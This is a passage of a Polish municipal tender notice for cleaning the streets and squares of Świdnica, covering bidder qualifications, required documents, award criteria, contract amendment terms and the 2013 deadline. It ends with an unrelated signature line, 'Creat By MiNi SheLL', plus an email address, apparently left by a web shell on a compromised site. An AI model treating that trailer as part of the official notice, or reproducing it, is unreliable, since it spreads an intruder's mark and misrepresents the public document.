20.03.03 ( wyrażoną w formie aktualnej umowy lub pisemnego zobowiązania ) na przyjęcie odpadów pochodzących z czyszczenia ulic i placów miasta Świdnicy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi spełniać następujący warunek:
- dysponować osobą odpowiedzialną za realizację usług posiadającą minimum średnie wykształcenie,
- posiadać średnie roczne zatrudnienie w okresie ostatnich 3 lat a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie  nie niższe niż 25 osób.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że posiada środki finansowe lub zdolność kredytową w wysokości min. 100 000 zł ( sto tysięcy złotych ) oraz, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na sumę ubezpieczenia nie mniejszą niż 50 000 zł ( pięćdziesiąt tysięcy złotych ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>wykaz  wykonanych  a w przypadku świadczeń okresowych lub ciągłych również wykonywanych głównych usług  w okresie ostatnich 3 lat  przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie polegających na oczyszczaniu ulic i placów   o wartości łącznej nie mniejszej niż  300 000 zł brutto,  w tym jedno zadanie na kwotę minimum 100 000 zł brutto, z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów czy zostały wykonane lub są wykonywane  należycie.
Wzór wykazu wykonanych prac stanowi załącznik C do SIWZ ( załącznik nr 2 do oferty Wykonawcy ).;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">inne dokumenty dotyczące sytuacji ekonomicznej i finansowej:<br>Jeżeli z uzasadnionej przyczyny Wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez Zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez Zamawiającego warunku.
Jeżeli Wykonawca będzie polegał na zdolności ekonomiczno-finansowej podmiotów trzecich do oferty winien dołączyć oświadczenie o solidarnej odpowiedzialności za realizację zadania Wykonawcy i tych podmiotów ( art. 369 k.c.).;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>.  Dodatkowo Wykonawca winien do oferty dołączyć: 
- dowód wniesienia wadium ( załącznik nr 19 do oferty Wykonawcy ),
- pełnomocnictwo do podpisania oferty w przypadku , gdy ofertę podpisuje osoba ( osoby nie wskazane w dokumencie rejestrowym ) upoważniona do składania oświadczeń woli przez Wykonawcę  ( załącznik nr 20 do oferty Wykonawcy  ),
- pełnomocnictwo dla pełnomocnika składającego ofertę w ramach oferty wspólnej ( załącznik nr 21 do oferty  Wykonawcy ),
- informację o przynależności do grupy kapitałowej w przypadku gdy Wykonawca należy do grupy kapitałowej - załącznik J do SIWZ ( załącznik nr 22 do oferty Wykonawcy )
-  kosztorys ofertowy - załącznik K do SIWZ ( załącznik nr 23 do oferty Wykonawcy ),
- zaparafowany projekt umowy - załącznik L do SIWZ ( załącznik nr 24 do oferty Wykonawcy).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający wymaga od Wykonawcy aby zawarł z nim umowę w sprawie zamówienia publicznego na takich warunkach jak umowa, której projekt stanowi załącznik L do SIWZ.
Zamawiający przewiduje zmiany umowy wprowadzane aneksem zaakceptowanym przez obie strony w następujących przypadkach:
a)  jeżeli zmiana umowy jest korzystna dla Zamawiającego ( korzyść ekonomiczna, techniczna, eksploatacyjna),
b) jeżeli wystąpiły okoliczności, których przy dołożeniu należytej staranności strony na dzień podpisania umowy przewidzieć nie mogły, a wynikają one ze zmian przepisów prawa, które nastąpiły w czasie realizacji zamówienia,
c) z powodu okoliczności siły wyższej np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć, w szczególności zagrażającego
bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach. 
19.3 Zamawiającemu przysługuje prawo do natychmiastowego odstąpienia 
od umowy w przypadku:
a) gdy zostanie ogłoszona upadłość lub rozwiązanie firmy Wykonawcy,
b) gdy zostanie wydany nakaz zajęcia majątku Wykonawcy,
c) jeżeli Wykonawca nie rozpoczął prac bez uzasadnionych przyczyn, nie kontynuuje ich mimo wezwania Zamawiającego złożonego na piśmie a przerwa w realizacji trwa dłużej niż 7 dni,
d) rażących zaniedbań w realizacji przedmiotu umowy. Przez rażące zaniedbanie należy rozumieć sytuację w której w trakcie trzymiesięcznego okresu trwania umowy Zamawiający
naliczył co najmniej 2 kary z tytułu o których mowa w  § 12 umowy ust. 1 pkt. b, c i d.
e) braku dokumentu o którym mowa w § 10 umowy.
19.4 Zamawiający w okresie trwania umowy ma prawo wyłączyć z oczyszczania ulice na których będą prowadzone prace budowlane lub remontowe, prowadzona będzie działalność gospodarcza np. ogródki gastronomiczne oraz innego rodzaju przedsięwzięcia finansowane przez Gminę Miasto Świdnica.
19.5 W przypadku  ograniczenia zakresu prac o którym mowa w  pkt. 19.4 miesięczne wynagrodzenie za realizację zadania A lub B zostanie obniżone proporcjonalnie do zakresu ograniczonych prac. W takiej sytuacji  Wykonawcy nie przysługuje roszczenie odszkodowawcze.
19.6 Termin płatności: Zamawiający zobowiązuje się do uregulowania należności na rzecz Wykonawcy w terminie 30 dni od daty otrzymania faktury.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.swidnica.bip-gov.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Świdnicy, ul. Armii Krajowej 49, 58-100 Świdnica, Miejskie Biuro Przetargów, pok. 124, I p..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.06.2013 godzina 08:30, miejsce: Urząd Miejski w Świdnicy, ul. Armii Krajowej 49, 58-100 Świdnica, Miejskie Biuro Przetargów, pok. 124, I p..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com